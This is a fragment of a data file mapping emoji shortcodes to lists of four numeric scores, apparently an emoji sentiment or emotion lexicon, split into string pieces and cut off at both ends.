[0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002,", "0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128, 0.111], \":rabbit_face:\":", "0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08], \":Tokyo_tower:\": [0.115, 0.092, 0.168, 0.24],", "0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36],", "0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\": [0.177,", "0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13,", "0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003, 0.122], \":currency_exchange:\":", "[0.184, 0.242, 0.254, 0.37], \":herb:\": [0.152, 0.282, 0.509, 0.138], \":guard:\": [0.19, 0.23, 0.081,", "0.226], \":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002,", "0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\":", "0.162, 0.256, 0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392],", "[0.23600000000000002, 0.253, 0.13, 0.273], \":nail_polish:\": [0.418, 0.121, 0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998,", "0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 
0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\":", "0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\":", "\":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212], \":sushi:\": [0.134, 0.196,", "0.113, 0.228], \":Taurus:\": [0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\":", "0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\":", "[0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261,", "0.361], \":guitar:\": [0.14400000000000002, 0.125, 0.257, 0.304], \":pig_face:\": [0.179, 0.214, 0.165, 0.337], \":hamster_face:\": [0.215,", "0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228, 0.128, 0.248], \":wavy_dash:\": [0.235, 0.287, 0.253, 0.268],", "0.245], \":ogre:\": [0.37, 0.419, 0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997,", "[0.27, 0.263, 0.276, 0.215], \":calendar:\": [0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128,", "0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001],", "[0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19, 0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003,", "[0.067, 0.073, 0.248, 0.247], \":mount_fuji:\": [0.196, 0.225, 
0.253, 0.172], \":play_button:\": [0.168, 0.284, 0.17,", "0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203,", "0.175, 0.29, 0.16], \":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264, 0.195],", "0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193,", "0.109, 0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248], \":hot_beverage:\": [0.142, 0.2, 0.317, 0.106],", "0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003],", "0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998],", "[0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154,", "0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\":", "0.225, 0.159], \":open_book:\": [0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\":", "0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358, 0.22699999999999998],", "\":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001,", "[0.309, 0.485, 0.14, 0.369], \":flushed_face:\": [0.281, 0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374, 
0.145,", "0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214, 0.11199999999999999, 0.207],", "0.207, 0.317, 0.261], \":microphone:\": [0.121, 0.081, 0.237, 0.29], \":musical_score:\": [0.149, 0.09, 0.371, 0.315],", "0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19,", "0.245, 0.192, 0.034], \":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341, 0.207],", "[0.445, 0.245, 0.21, 0.264], \":Capricorn:\": [0.196, 0.172, 0.3, 0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004,", "0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445, 0.136, 0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\":", "[0.299, 0.263, 0.136, 0.177], \":anguished_face:\": [0.309, 0.485, 0.14, 0.369], \":flushed_face:\": [0.281, 0.263, 0.102,", "0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001],", "0.128, 0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\":", "0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239], \":syringe:\": [0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249,", "0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098,", "0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225, 0.142, 0.205], \":horse_face:\":", "[0.175, 0.245, 0.37, 0.188], \":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998, 0.166], 
\":floppy_disk:\": [0.168, 0.324, 0.341,", "0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22, 0.179, 0.245, 0.243], \":ice_cream:\": [0.228,", "\":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261, 0.188], \":melon:\": [0.282, 0.313,", "0.159, 0.086, 0.245], \":ogre:\": [0.37, 0.419, 0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215],", "0.221], \":mouth:\": [0.245, 0.136, 0.321, 0.121], \":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001,", "0.203, 0.128, 0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131],", "[0.259, 0.142, 0.46, 0.299], \":downwards_button:\": [0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165,", "[0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266,", "[0.149, 0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001,", "0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22, 0.179, 0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114],", "0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\":", "0.13, 0.273], \":nail_polish:\": [0.418, 0.121, 0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\":", "0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\": [0.165, 0.361, 0.171, 0.282], \":jeans:\":", "\":person_getting_haircut:\": 
[0.237, 0.215, 0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": [0.415, 0.308,", "0.217, 0.158, 0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\": [0.268, 0.27, 0.174, 0.102],", "\":white_small_square:\": [0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24,", "0.371], \":bar_chart:\": [0.213, 0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141,", "[0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\": [0.078, 0.221, 0.139,", "\":electric_plug:\": [0.124, 0.14, 0.078, 0.139], \":cloud:\": [0.18, 0.231, 0.266, 0.295], \":watch:\": [0.183, 0.276,", "\":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251,", "[0.17600000000000002, 0.155, 0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998,", "[0.111, 0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203, 0.345, 0.193], \":link:\": [0.258, 0.217, 0.179,", "0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37], \":herb:\": [0.152,", "0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\":", "\":bug:\": [0.268, 0.27, 0.174, 0.102], \":blowfish:\": [0.21, 0.214, 0.155, 0.138], \":bear_face:\": [0.205, 0.256,", "0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282], 
\":crescent_moon:\":", "\":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233,", "0.242], \":blond-haired_person:\": [0.257, 0.23, 0.226, 0.166], \":love_letter:\": [0.13, 0.15, 0.331, 0.142], \":bomb:\": [0.22,", "0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205,", "[0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113,", "0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08], \":Tokyo_tower:\": [0.115, 0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001,", "[0.251, 0.182, 0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221,", "0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175], \":key:\":", "[0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001,", "\":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139,", "[0.083, 0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006,", "0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217,", "0.261, 0.188], \":melon:\": [0.282, 0.313, 0.262, 0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998, 0.10400000000000001], 
\":droplet:\":", "0.406], \":telephone:\": [0.257, 0.204, 0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185,", "0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001],", "\":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196,", "0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332, 0.261],", "0.149, 0.177, 0.193], \":two_o’clock:\": [0.122, 0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239],", "0.193], \":two_o’clock:\": [0.122, 0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147,", "0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\":", "\":five_o’clock:\": [0.126, 0.335, 0.21, 0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251,", "0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235,", "0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\":", "\":jeans:\": [0.2, 0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002,", "[0.225, 0.251, 0.231, 
0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998,", "0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\":", "0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125],", "\":warning:\": [0.264, 0.293, 0.107, 0.212], \":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298,", "0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145], \":clapper_board:\": [0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\":", "0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\": [0.203,", "0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136, 0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001,", "0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204,", "0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273], \":nail_polish:\": [0.418, 0.121, 0.314, 0.099], \":nine_o’clock:\":", "\":blond-haired_person:\": [0.257, 0.23, 0.226, 0.166], \":love_letter:\": [0.13, 0.15, 0.331, 0.142], \":bomb:\": [0.22, 0.196,", "0.282], \":jeans:\": [0.2, 0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\": [0.174,", "0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198],", "\":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 
0.231], \":tropical_fish:\": [0.063, 0.271,", "\":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999], \":green_apple:\": [0.16, 0.188,", "[0.068, 0.084, 0.08, 0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155,", "0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188],", "0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198,", "[0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111,", "[0.264, 0.261, 0.23800000000000002, 0.295], \":yellow_heart:\": [0.158, 0.177, 0.27, 0.262], \":Gemini:\": [0.228, 0.132, 0.262,", "0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31],", "0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\":", "\":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002,", "[0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998,", "0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3, 0.29], \":notebook:\": [0.128, 
0.14400000000000002, 0.281, 0.174], \":black_square_button:\":", "0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14], \":hospital:\": [0.128, 0.376, 0.305, 0.184],", "0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\":", "0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317, 0.261], \":microphone:\": [0.121, 0.081, 0.237, 0.29],", "0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222, 0.289], \":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122,", "0.272], \":glowing_star:\": [0.191, 0.215, 0.38, 0.134], \":person_swimming:\": [0.175, 0.159, 0.086, 0.245], \":ogre:\": [0.37,", "0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146], \":pushpin:\": [0.299, 0.263, 0.136, 0.177], \":anguished_face:\":", "0.196, 0.163, 0.205], \":direct_hit:\": [0.177, 0.213, 0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289],", "0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 0.231],", "[0.22, 0.179, 0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16, 0.159,", "0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\":", "0.151], \":barber_pole:\": [0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\": [0.174,", "[0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254,", 
"0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146], \":pushpin:\": [0.299, 0.263, 0.136, 0.177], \":anguished_face:\": [0.309,", "0.313, 0.262, 0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248],", "\":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001,", "\":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155, 0.087], \":electric_plug:\": [0.124, 0.14,", "[0.223, 0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002,", "0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105, 0.34],", "0.136, 0.133], \":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002], \":night_with_stars:\":", "0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\":", "\":anguished_face:\": [0.309, 0.485, 0.14, 0.369], \":flushed_face:\": [0.281, 0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374,", "0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114, 0.048, 0.039, 0.207],", "0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001,", "0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105, 
0.34], \":fast-forward_button:\": [0.327,", "0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317, 0.261], \":microphone:\": [0.121,", "[0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002,", "[0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141, 0.156, 0.182, 0.16699999999999998], \":pot_of_food:\": [0.18, 0.149, 0.177,", "\":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204], \":down_arrow:\": [0.33899999999999997, 0.268,", "[0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191,", "0.09, 0.159], \":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25, 0.266], \":movie_camera:\":", "0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\":", "0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155],", "0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004],", "0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146],", "0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322,", "0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998],", "0.16699999999999998, 
